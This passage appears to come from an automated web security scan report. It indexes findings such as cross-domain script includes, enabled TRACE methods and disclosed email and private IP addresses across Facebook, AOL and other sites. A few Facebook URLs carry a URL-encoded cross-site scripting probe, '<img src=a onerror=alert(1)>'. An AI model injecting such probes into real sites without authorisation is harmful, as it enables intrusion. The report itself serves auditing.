16.76. http://www.facebook.com/sharer.php

16.77. http://www.facebook.com/terms.php

16.78. http://www.facebook.com/terms.php

16.79. http://www.flickr.com/badge_code_v2.gne

16.80. http://www.games.com/game/family-feud/

16.81. http://www.google.com/search

16.82. http://www.google.com/url

16.83. http://www.google.com/url

16.84. http://www.google.com/webhp

16.85. http://www.huffingtonpost.com/

16.86. http://www.huffingtonpost.com/

16.87. http://www.huffingtonpost.com/

16.88. http://www.huffingtonpost.com/blogs_front.html

16.89. http://www.huffingtonpost.com/news_col_1.html

16.90. http://www.huffingtonpost.com/news_col_2.html

16.91. http://www.huffingtonpost.com/permalink-tracker.html

16.92. http://www.huffingtonpost.com/threeup.php

16.93. http://www.mapquest.com/

16.94. http://www.mapquest.com/

16.95. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

16.96. http://yellowpages.aol.com/

17. Cross-domain script include

17.1. http://www.aim.com/products/express/

17.2. http://www.aol.com/

17.3. http://www.bankrate.com/funnel/mortgages/

17.4. http://www.blogsmithmedia.com/www.dailyfinance.com/media/dailyfinance.css

17.5. http://www.citysbest.com/

17.6. http://www.crunchboard.com/opening/detailjob.php

17.7. http://www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

17.8. http://www.dailyfinance.com/

17.9. http://www.dailyfinance.com/markets/mostactives

17.10. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

17.11. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

17.12. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

17.13. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

17.14. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

17.15. http://www.facebook.com/

17.16. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

17.17. http://www.facebook.com/10000082482078341583

17.18. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

17.19. http://www.facebook.com/1242845259

17.20. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

17.21. http://www.facebook.com/2008/fbml

17.22. http://www.facebook.com/AOLrealestate

17.23. http://www.facebook.com/BPAmerica

17.24. http://www.facebook.com/DailyFinance

17.25. http://www.facebook.com/HockeyKen

17.26. http://www.facebook.com/KickIceForever

17.27. http://www.facebook.com/LadyBonesie

17.28. http://www.facebook.com/Loizza

17.29. http://www.facebook.com/aim

17.30. http://www.facebook.com/ajax/intl/language_dialog.php

17.31. http://www.facebook.com/aol

17.32. http://www.facebook.com/aolradio

17.33. http://www.facebook.com/burkerkink

17.34. http://www.facebook.com/careers/

17.35. http://www.facebook.com/deedee.perez1

17.36. http://www.facebook.com/directory/pages/

17.37. http://www.facebook.com/directory/people/

17.38. http://www.facebook.com/facebook

17.39. http://www.facebook.com/fayse

17.40. http://www.facebook.com/find-friends

17.41. http://www.facebook.com/find-friends

17.42. http://www.facebook.com/gale.l.schenk

17.43. http://www.facebook.com/help/

17.44. http://www.facebook.com/help/

17.45. http://www.facebook.com/izaOllie

17.46. http://www.facebook.com/jezzas

17.47. http://www.facebook.com/kimberly.christ

17.48. http://www.facebook.com/ladonna.lokey

17.49. http://www.facebook.com/lakendra.roberts

17.50. http://www.facebook.com/login.php

17.51. http://www.facebook.com/matthew.oliveira2

17.52. http://www.facebook.com/mmafighting

17.53. http://www.facebook.com/mobile/

17.54. http://www.facebook.com/pages/Barnesville/115038011847083

17.55. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820

17.56. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478

17.57. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059

17.58. http://www.facebook.com/pages/Editor-in-Chief/137829579583400

17.59. http://www.facebook.com/pages/Gilco-Corporation/109823499042436

17.60. http://www.facebook.com/pages/HMFIC/149403761740008

17.61. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312

17.62. http://www.facebook.com/pages/Merchandiser/123981654314779

17.63. http://www.facebook.com/pages/New-Haven-College/130105783687523

17.64. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674

17.65. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680

17.66. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

17.67. http://www.facebook.com/pages/Sporting-News/104068362964496

17.68. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520

17.69. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

17.70. http://www.facebook.com/pages/create.php

17.71. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580

17.72. http://www.facebook.com/patroyo

17.73. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

17.74. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

17.75. http://www.facebook.com/people/Bucky-Jordan/100000824820783

17.76. http://www.facebook.com/plugins/activity.php

17.77. http://www.facebook.com/plugins/activity.php

17.78. http://www.facebook.com/plugins/comments.php

17.79. http://www.facebook.com/plugins/comments.php

17.80. http://www.facebook.com/plugins/facepile.php

17.81. http://www.facebook.com/plugins/facepile.php

17.82. http://www.facebook.com/plugins/like.php

17.83. http://www.facebook.com/plugins/likebox.php

17.84. http://www.facebook.com/plugins/likebox.php

17.85. http://www.facebook.com/plugins/recommendations.php

17.86. http://www.facebook.com/plugins/recommendations.php

17.87. http://www.facebook.com/plugins/send.php

17.88. http://www.facebook.com/plugins/send.php

17.89. http://www.facebook.com/policy.php

17.90. http://www.facebook.com/privacy/explanation.php

17.91. http://www.facebook.com/r.php

17.92. http://www.facebook.com/r.php

17.93. http://www.facebook.com/robynalys

17.94. http://www.facebook.com/share.php

17.95. http://www.facebook.com/sharer.php

17.96. http://www.facebook.com/skdarealist

17.97. http://www.facebook.com/sportingnews

17.98. http://www.facebook.com/stefanoboscolomarchi

17.99. http://www.facebook.com/techcrunch

17.100. http://www.facebook.com/terms.php

17.101. http://www.facebook.com/terms.php

17.102. http://www.facebook.com/theteebers

17.103. http://www.facebook.com/wmoppert

17.104. https://www.fightmagazine.com/mma-magazine/subscribe.asp

17.105. http://www.games.com/browse-games/all/

17.106. http://www.games.com/game-play/family-feud/single

17.107. http://www.games.com/game/family-feud/

17.108. https://www.godaddy.com/

17.109. https://www.godaddy.com/domains/search.aspx

17.110. https://www.godaddy.com/gdshop/hosting/landing.asp

17.111. http://www.huffingtonpost.com/

17.112. http://www.huffingtonpost.com/2011/05/02/

17.113. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html

17.114. http://www.huffingtonpost.com/2011/05/04/

17.115. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html

17.116. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html

17.117. http://www.huffingtonpost.com/advertise/

17.118. http://www.huffingtonpost.com/imam-feisal-abdul-rauf/bin-laden-terrorism_b_857345.html

17.119. http://www.huffingtonpost.com/newsinc/landing_page.html

17.120. http://www.huffingtonpost.com/permalink-tracker.html

17.121. http://www.huffingtonpost.com/rep-carolyn-maloney/the-cfpb-needs-to-get-to_b_857393.html

17.122. http://www.huffingtonpost.com/users/logout/

17.123. http://www.lakewoodbeacon.org/

17.124. http://www.mapquest.com/

17.125. http://www.mapquest.com/directions

17.126. http://www.mapquest.com/maps

17.127. http://www.mapquest.com/routeplanner

17.128. http://www.marketwatch.com/News/Story/Story.aspx

17.129. http://www.mmafighting.com/

17.130. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

17.131. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

17.132. http://www.mmawarehouse.com/

17.133. http://www.mmawarehouse.com/Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm

17.134. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm

17.135. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm

17.136. http://www.mmawarehouse.com/FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm

17.137. http://www.mmawarehouse.com/FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm

17.138. http://www.mmawarehouse.com/Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm

17.139. http://www.mmawarehouse.com/Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm

17.140. http://www.moviefone.com/

17.141. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

17.142. http://www.popeater.com/

17.143. http://www.truveo.com/

17.144. http://www.truveo.com/client/versions/univ_ent/js/truveo.libs.util.v1304543460.js

17.145. http://www.truveo.com/search

17.146. http://www.tuaw.com/hub/app-reviews

17.147. http://yellowpages.aol.com/

18. TRACE method is enabled

18.1. http://www.aim.com/

18.2. http://www.aolnews.com/

18.3. http://www.citysbest.com/

18.4. http://www.crunchboard.com/

18.5. http://www.dailyfinance.com/

18.6. http://www.dooce.com/

18.7. http://www.mmafighting.com/

18.8. http://www.moviefone.com/

18.9. http://www.popeater.com/

18.10. http://www.truveo.com/

18.11. http://www.tuaw.com/

18.12. http://xml.truveo.com/

19. Email addresses disclosed

19.1. http://www.dailyfinance.com/markets/mostactives

19.2. http://www.games.com/browse-games/all/

19.3. http://www.games.com/game-play/family-feud/single

19.4. http://www.games.com/game/family-feud/

19.5. https://www.godaddy.com/

19.6. https://www.godaddy.com/domains/search.aspx

19.7. https://www.godaddy.com/gdshop/hosting/landing.asp

19.8. http://www.google.com/s

19.9. http://www.google.com/search

19.10. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html

19.11. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html

19.12. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html

19.13. http://www.lakewoodbeacon.org/

19.14. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

19.15. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

19.16. https://www.neodata.com/pub/snew/new_print.shtml

19.17. http://www.popeater.com/

19.18. http://www.truveo.com/client/versions/univ_ent/js/truveo.module.jquery.jmycarousel.v1304543462.js

20. Private IP addresses disclosed

20.1. http://www.crunchgear.com/wp-content/uploads/2011/05/Intel-22nm_Transistor_2.jpg

20.2. http://www.crunchgear.com/wp-content/uploads/2011/05/Screen-shot-2011-05-04-at-2.13.39-PM.jpg

20.3. http://www.facebook.com/

20.4. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

20.5. http://www.facebook.com/10000082482078341583

20.6. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

20.7. http://www.facebook.com/1242845259

20.8. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

20.9. http://www.facebook.com/2008/fbml

20.10. http://www.facebook.com/AOLrealestate

20.11. http://www.facebook.com/BPAmerica

20.12. http://www.facebook.com/BPAmerica

20.13. http://www.facebook.com/BPAmerica

20.14. http://www.facebook.com/DailyFinance

20.15. http://www.facebook.com/HockeyKen

20.16. http://www.facebook.com/KickIceForever

20.17. http://www.facebook.com/LadyBonesie

20.18. http://www.facebook.com/Loizza

20.19. http://www.facebook.com/aim

20.20. http://www.facebook.com/ajax/connect/feedback.php

20.21. http://www.facebook.com/ajax/connect/vote.php

20.22. http://www.facebook.com/ajax/connect/vote.php

20.23. http://www.facebook.com/ajax/connect/vote.php

20.24. http://www.facebook.com/ajax/connect/vote.php

20.25. http://www.facebook.com/ajax/intl/language_dialog.php

20.26. http://www.facebook.com/ajax/intl/language_dialog.php

20.27. http://www.facebook.com/ajax/intl/language_dialog.php

20.28. http://www.facebook.com/ajax/reg_birthday_help.php

20.29. http://www.facebook.com/ajax/register/logging.php

20.30. http://www.facebook.com/aol

20.31. http://www.facebook.com/aolradio

20.32. http://www.facebook.com/badges

20.33. http://www.facebook.com/badges

20.34. http://www.facebook.com/badges

20.35. http://www.facebook.com/burkerkink

20.36. http://www.facebook.com/campaign/landing.php

20.37. http://www.facebook.com/campaign/landing.php

20.38. http://www.facebook.com/campaign/landing.php

20.39. http://www.facebook.com/campaign/landing.php

20.40. http://www.facebook.com/captcha/tfbimage.php

20.41. http://www.facebook.com/captcha/tfbimage.php

20.42. http://www.facebook.com/careers/

20.43. http://www.facebook.com/careers/

20.44. http://www.facebook.com/careers/

20.45. http://www.facebook.com/deedee.perez1

20.46. http://www.facebook.com/directory/pages/

20.47. http://www.facebook.com/directory/people/

20.48. http://www.facebook.com/extern/login_status.php

20.49. http://www.facebook.com/extern/login_status.php

20.50. http://www.facebook.com/extern/login_status.php

20.51. http://www.facebook.com/extern/login_status.php

20.52. http://www.facebook.com/extern/login_status.php

20.53. http://www.facebook.com/extern/login_status.php

20.54. http://www.facebook.com/extern/login_status.php

20.55. http://www.facebook.com/extern/login_status.php

20.56. http://www.facebook.com/extern/login_status.php

20.57. http://www.facebook.com/extern/login_status.php

20.58. http://www.facebook.com/extern/login_status.php

20.59. http://www.facebook.com/extern/login_status.php

20.60. http://www.facebook.com/extern/login_status.php

20.61. http://www.facebook.com/extern/login_status.php

20.62. http://www.facebook.com/extern/login_status.php

20.63. http://www.facebook.com/extern/login_status.php

20.64. http://www.facebook.com/extern/login_status.php

20.65. http://www.facebook.com/extern/login_status.php

20.66. http://www.facebook.com/extern/login_status.php

20.67. http://www.facebook.com/extern/login_status.php

20.68. http://www.facebook.com/extern/login_status.php

20.69. http://www.facebook.com/extern/login_status.php

20.70. http://www.facebook.com/extern/login_status.php

20.71. http://www.facebook.com/extern/login_status.php

20.72. http://www.facebook.com/extern/login_status.php

20.73. http://www.facebook.com/extern/login_status.php

20.74. http://www.facebook.com/extern/login_status.php

20.75. http://www.facebook.com/extern/login_status.php

20.76. http://www.facebook.com/extern/login_status.php

20.77. http://www.facebook.com/extern/login_status.php

20.78. http://www.facebook.com/extern/login_status.php

20.79. http://www.facebook.com/extern/login_status.php

20.80. http://www.facebook.com/extern/login_status.php

20.81. http://www.facebook.com/extern/login_status.php

20.82. http://www.facebook.com/extern/login_status.php

20.83. http://www.facebook.com/extern/login_status.php

20.84. http://www.facebook.com/extern/login_status.php

20.85. http://www.facebook.com/extern/login_status.php

20.86. http://www.facebook.com/extern/login_status.php

20.87. http://www.facebook.com/extern/login_status.php

20.88. http://www.facebook.com/extern/login_status.php

20.89. http://www.facebook.com/extern/login_status.php

20.90. http://www.facebook.com/extern/login_status.php

20.91. http://www.facebook.com/extern/login_status.php

20.92. http://www.facebook.com/extern/login_status.php

20.93. http://www.facebook.com/extern/login_status.php

20.94. http://www.facebook.com/extern/login_status.php

20.95. http://www.facebook.com/extern/login_status.php

20.96. http://www.facebook.com/extern/login_status.php

20.97. http://www.facebook.com/extern/login_status.php

20.98. http://www.facebook.com/extern/login_status.php

20.99. http://www.facebook.com/extern/login_status.php

20.100. http://www.facebook.com/extern/login_status.php

20.101. http://www.facebook.com/extern/login_status.php

20.102. http://www.facebook.com/extern/login_status.php

20.103. http://www.facebook.com/extern/login_status.php

20.104. http://www.facebook.com/extern/login_status.php

20.105. http://www.facebook.com/extern/login_status.php

20.106. http://www.facebook.com/extern/login_status.php

20.107. http://www.facebook.com/extern/login_status.php

20.108. http://www.facebook.com/extern/login_status.php

20.109. http://www.facebook.com/extern/login_status.php

20.110. http://www.facebook.com/extern/login_status.php

20.111. http://www.facebook.com/extern/login_status.php

20.112. http://www.facebook.com/extern/login_status.php

20.113. http://www.facebook.com/extern/login_status.php

20.114. http://www.facebook.com/extern/login_status.php

20.115. http://www.facebook.com/extern/login_status.php

20.116. http://www.facebook.com/extern/login_status.php

20.117. http://www.facebook.com/extern/login_status.php

20.118. http://www.facebook.com/extern/login_status.php

20.119. http://www.facebook.com/extern/login_status.php

20.120. http://www.facebook.com/extern/login_status.php

20.121. http://www.facebook.com/extern/login_status.php

20.122. http://www.facebook.com/extern/login_status.php

20.123. http://www.facebook.com/extern/login_status.php

20.124. http://www.facebook.com/extern/login_status.php

20.125. http://www.facebook.com/extern/login_status.php

20.126. http://www.facebook.com/extern/login_status.php

20.127. http://www.facebook.com/extern/login_status.php

20.128. http://www.facebook.com/extern/login_status.php

20.129. http://www.facebook.com/extern/login_status.php

20.130. http://www.facebook.com/extern/login_status.php

20.131. http://www.facebook.com/extern/login_status.php

20.132. http://www.facebook.com/extern/login_status.php

20.133. http://www.facebook.com/extern/login_status.php

20.134. http://www.facebook.com/extern/login_status.php

20.135. http://www.facebook.com/extern/login_status.php

20.136. http://www.facebook.com/extern/login_status.php

20.137. http://www.facebook.com/extern/login_status.php

20.138. http://www.facebook.com/extern/login_status.php

20.139. http://www.facebook.com/extern/login_status.php

20.140. http://www.facebook.com/extern/login_status.php

20.141. http://www.facebook.com/extern/login_status.php

20.142. http://www.facebook.com/extern/login_status.php

20.143. http://www.facebook.com/extern/login_status.php

20.144. http://www.facebook.com/extern/login_status.php

20.145. http://www.facebook.com/extern/login_status.php

20.146. http://www.facebook.com/extern/login_status.php

20.147. http://www.facebook.com/extern/login_status.php

20.148. http://www.facebook.com/extern/login_status.php

20.149. http://www.facebook.com/extern/login_status.php

20.150. http://www.facebook.com/extern/login_status.php

20.151. http://www.facebook.com/extern/login_status.php

20.152. http://www.facebook.com/extern/login_status.php

20.153. http://www.facebook.com/extern/login_status.php

20.154. http://www.facebook.com/extern/login_status.php

20.155. http://www.facebook.com/extern/login_status.php

20.156. http://www.facebook.com/extern/login_status.php

20.157. http://www.facebook.com/extern/login_status.php

20.158. http://www.facebook.com/extern/login_status.php

20.159. http://www.facebook.com/extern/login_status.php

20.160. http://www.facebook.com/extern/login_status.php

20.161. http://www.facebook.com/extern/login_status.php

20.162. http://www.facebook.com/extern/login_status.php

20.163. http://www.facebook.com/extern/login_status.php

20.164. http://www.facebook.com/extern/login_status.php

20.165. http://www.facebook.com/extern/login_status.php

20.166. http://www.facebook.com/extern/login_status.php

20.167. http://www.facebook.com/extern/login_status.php

20.168. http://www.facebook.com/extern/login_status.php

20.169. http://www.facebook.com/extern/login_status.php

20.170. http://www.facebook.com/extern/login_status.php

20.171. http://www.facebook.com/extern/login_status.php

20.172. http://www.facebook.com/extern/login_status.php

20.173. http://www.facebook.com/extern/login_status.php

20.174. http://www.facebook.com/extern/login_status.php

20.175. http://www.facebook.com/extern/login_status.php

20.176. http://www.facebook.com/extern/login_status.php

20.177. http://www.facebook.com/extern/login_status.php

20.178. http://www.facebook.com/extern/login_status.php

20.179. http://www.facebook.com/extern/login_status.php

20.180. http://www.facebook.com/extern/login_status.php

20.181. http://www.facebook.com/extern/login_status.php

20.182. http://www.facebook.com/extern/login_status.php

20.183. http://www.facebook.com/extern/login_status.php

20.184. http://www.facebook.com/extern/login_status.php

20.185. http://www.facebook.com/extern/login_status.php

20.186. http://www.facebook.com/extern/login_status.php

20.187. http://www.facebook.com/facebook

20.188. http://www.facebook.com/favicon.ico

20.189. http://www.facebook.com/fayse

20.190. http://www.facebook.com/find-friends

20.191. http://www.facebook.com/find-friends

20.192. http://www.facebook.com/find-friends

20.193. http://www.facebook.com/find-friends

20.194. http://www.facebook.com/gale.l.schenk

20.195. http://www.facebook.com/help/

20.196. http://www.facebook.com/help/

20.197. http://www.facebook.com/help/

20.198. http://www.facebook.com/help/

20.199. http://www.facebook.com/help/

20.200. http://www.facebook.com/home.php

20.201. http://www.facebook.com/images/policy/TRUSTe_EU.png

20.202. http://www.facebook.com/images/policy/TRUSTe_verify.png

20.203. http://www.facebook.com/izaOllie

20.204. http://www.facebook.com/jezzas

20.205. http://www.facebook.com/kimberly.christ

20.206. http://www.facebook.com/ladonna.lokey

20.207. http://www.facebook.com/lakendra.roberts

20.208. http://www.facebook.com/login.php

20.209. http://www.facebook.com/login.php

20.210. http://www.facebook.com/mapquest

20.211. http://www.facebook.com/matthew.oliveira2

20.212. http://www.facebook.com/mmafighting

20.213. http://www.facebook.com/mobile

20.214. http://www.facebook.com/mobile

20.215. http://www.facebook.com/mobile

20.216. http://www.facebook.com/mobile

20.217. http://www.facebook.com/mobile/

20.218. http://www.facebook.com/mobile/

20.219. http://www.facebook.com/mobile/

20.220. http://www.facebook.com/mobile/

20.221. http://www.facebook.com/pages/Barnesville/115038011847083

20.222. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820

20.223. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478

20.224. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059

20.225. http://www.facebook.com/pages/Editor-in-Chief/137829579583400

20.226. http://www.facebook.com/pages/Gilco-Corporation/109823499042436

20.227. http://www.facebook.com/pages/HMFIC/149403761740008

20.228. http://www.facebook.com/pages/HuffPost-World/70242384902

20.229. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312

20.230. http://www.facebook.com/pages/Merchandiser/123981654314779

20.231. http://www.facebook.com/pages/New-Haven-College/130105783687523

20.232. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674

20.233. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680

20.234. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

20.235. http://www.facebook.com/pages/Sporting-News/104068362964496

20.236. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520

20.237. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

20.238. http://www.facebook.com/pages/create.php

20.239. http://www.facebook.com/pages/create.php

20.240. http://www.facebook.com/pages/create.php

20.241. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580

20.242. http://www.facebook.com/patroyo

20.243. http://www.facebook.com/people/Alexander-Bucky%20-Jordan/1242845259

20.244. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

20.245. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

20.246. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783

20.247. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783

20.248. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783

20.249. http://www.facebook.com/people/Bucky-Jordan/100000824820783

20.250. http://www.facebook.com/people/Bucky-Jordan/100000824820783

20.251. http://www.facebook.com/people/Bucky-Jordan/100000824820783

20.252. http://www.facebook.com/people/Bucky-Jordan/100000824820783/x22

20.253. http://www.facebook.com/plugins/activity.php

20.254. http://www.facebook.com/plugins/activity.php

20.255. http://www.facebook.com/plugins/activity.php

20.256. http://www.facebook.com/plugins/activity.php

20.257. http://www.facebook.com/plugins/activity.php

20.258. http://www.facebook.com/plugins/activity.php

20.259. http://www.facebook.com/plugins/activity.php

20.260. http://www.facebook.com/plugins/activity.php

20.261. http://www.facebook.com/plugins/activity.php

20.262. http://www.facebook.com/plugins/activity.php

20.263. http://www.facebook.com/plugins/activity.php

20.264. http://www.facebook.com/plugins/activity.php

20.265. http://www.facebook.com/plugins/activity.php

20.266. http://www.facebook.com/plugins/activity.php

20.267. http://www.facebook.com/plugins/activity.php

20.268. http://www.facebook.com/plugins/activity.php

20.269. http://www.facebook.com/plugins/activity.php

20.270. http://www.facebook.com/plugins/activity.php

20.271. http://www.facebook.com/plugins/activity.php

20.272. http://www.facebook.com/plugins/activity.php

20.273. http://www.facebook.com/plugins/activity.php

20.274. http://www.facebook.com/plugins/activity.php

20.275. http://www.facebook.com/plugins/activity.php

20.276. http://www.facebook.com/plugins/activity.php

20.277. http://www.facebook.com/plugins/activity.php

20.278. http://www.facebook.com/plugins/activity.php

20.279. http://www.facebook.com/plugins/activity.php

20.280. http://www.facebook.com/plugins/activity.php

20.281. http://www.facebook.com/plugins/activity.php

20.282. http://www.facebook.com/plugins/activity.php

20.283. http://www.facebook.com/plugins/activity.php

20.284. http://www.facebook.com/plugins/activity.php

20.285. http://www.facebook.com/plugins/activity.php

20.286. http://www.facebook.com/plugins/activity.php

20.287. http://www.facebook.com/plugins/activity.php

20.288. http://www.facebook.com/plugins/activity.php

20.289. http://www.facebook.com/plugins/activity.php

20.290. http://www.facebook.com/plugins/activity.php

20.291. http://www.facebook.com/plugins/activity.php

20.292. http://www.facebook.com/plugins/activity.php

20.293. http://www.facebook.com/plugins/activity.php

20.294. http://www.facebook.com/plugins/activity.php

20.295. http://www.facebook.com/plugins/activity.php

20.296. http://www.facebook.com/plugins/activity.php

20.297. http://www.facebook.com/plugins/activity.php

20.298. http://www.facebook.com/plugins/activity.php

20.299. http://www.facebook.com/plugins/activity.php

20.300. http://www.facebook.com/plugins/activity.php

20.301. http://www.facebook.com/plugins/activity.php

20.302. http://www.facebook.com/plugins/activity.php

20.303. http://www.facebook.com/plugins/activity.php

20.304. http://www.facebook.com/plugins/activity.php

20.305. http://www.facebook.com/plugins/activity.php

20.306. http://www.facebook.com/plugins/activity.php

20.307. http://www.facebook.com/plugins/activity.php

20.308. http://www.facebook.com/plugins/activity.php

20.309. http://www.facebook.com/plugins/activity.php

20.310. http://www.facebook.com/plugins/activity.php

20.311. http://www.facebook.com/plugins/activity.php

20.312. http://www.facebook.com/plugins/activity.php

20.313. http://www.facebook.com/plugins/activity.php

20.314. http://www.facebook.com/plugins/activity.php

20.315. http://www.facebook.com/plugins/activity.php

20.316. http://www.facebook.com/plugins/comments.php

20.317. http://www.facebook.com/plugins/comments.php

20.318. http://www.facebook.com/plugins/comments.php

20.319. http://www.facebook.com/plugins/comments.php

20.320. http://www.facebook.com/plugins/comments.php

20.321. http://www.facebook.com/plugins/facepile.php

20.322. http://www.facebook.com/plugins/facepile.php

20.323. http://www.facebook.com/plugins/facepile.php

20.324. http://www.facebook.com/plugins/facepile.php

20.325. http://www.facebook.com/plugins/facepile.php

20.326. http://www.facebook.com/plugins/facepile.php

20.327. http://www.facebook.com/plugins/facepile.php

20.328. http://www.facebook.com/plugins/facepile.php

20.329. http://www.facebook.com/plugins/facepile.php

20.330. http://www.facebook.com/plugins/like.php

20.331. http://www.facebook.com/plugins/like.php

20.332. http://www.facebook.com/plugins/like.php

20.333. http://www.facebook.com/plugins/like.php

20.334. http://www.facebook.com/plugins/like.php

20.335. http://www.facebook.com/plugins/like.php

20.336. http://www.facebook.com/plugins/like.php

20.337. http://www.facebook.com/plugins/like.php

20.338. http://www.facebook.com/plugins/like.php

20.339. http://www.facebook.com/plugins/like.php

20.340. http://www.facebook.com/plugins/like.php

20.341. http://www.facebook.com/plugins/like.php

20.342. http://www.facebook.com/plugins/like.php

20.343. http://www.facebook.com/plugins/like.php

20.344. http://www.facebook.com/plugins/like.php

20.345. http://www.facebook.com/plugins/like.php

20.346. http://www.facebook.com/plugins/like.php

20.347. http://www.facebook.com/plugins/like.php

20.348. http://www.facebook.com/plugins/like.php

20.349. http://www.facebook.com/plugins/like.php

20.350. http://www.facebook.com/plugins/like.php

20.351. http://www.facebook.com/plugins/like.php

20.352. http://www.facebook.com/plugins/like.php

20.353. http://www.facebook.com/plugins/like.php

20.354. http://www.facebook.com/plugins/like.php

20.355. http://www.facebook.com/plugins/like.php

20.356. http://www.facebook.com/plugins/like.php

20.357. http://www.facebook.com/plugins/like.php

20.358. http://www.facebook.com/plugins/like.php

20.359. http://www.facebook.com/plugins/like.php

20.360. http://www.facebook.com/plugins/like.php

20.361. http://www.facebook.com/plugins/like.php

20.362. http://www.facebook.com/plugins/like.php

20.363. http://www.facebook.com/plugins/like.php

20.364. http://www.facebook.com/plugins/like.php

20.365. http://www.facebook.com/plugins/like.php

20.366. http://www.facebook.com/plugins/like.php

20.367. http://www.facebook.com/plugins/like.php

20.368. http://www.facebook.com/plugins/like.php

20.369. http://www.facebook.com/plugins/like.php

20.370. http://www.facebook.com/plugins/like.php

20.371. http://www.facebook.com/plugins/like.php

20.372. http://www.facebook.com/plugins/like.php

20.373. http://www.facebook.com/plugins/like.php

20.374. http://www.facebook.com/plugins/like.php

20.375. http://www.facebook.com/plugins/like.php

20.376. http://www.facebook.com/plugins/like.php

20.377. http://www.facebook.com/plugins/like.php

20.378. http://www.facebook.com/plugins/like.php

20.379. http://www.facebook.com/plugins/like.php

20.380. http://www.facebook.com/plugins/like.php

20.381. http://www.facebook.com/plugins/like.php

20.382. http://www.facebook.com/plugins/like.php

20.383. http://www.facebook.com/plugins/like.php

20.384. http://www.facebook.com/plugins/like.php

20.385. http://www.facebook.com/plugins/like.php

20.386. http://www.facebook.com/plugins/like.php

20.387. http://www.facebook.com/plugins/like.php

20.388. http://www.facebook.com/plugins/like.php

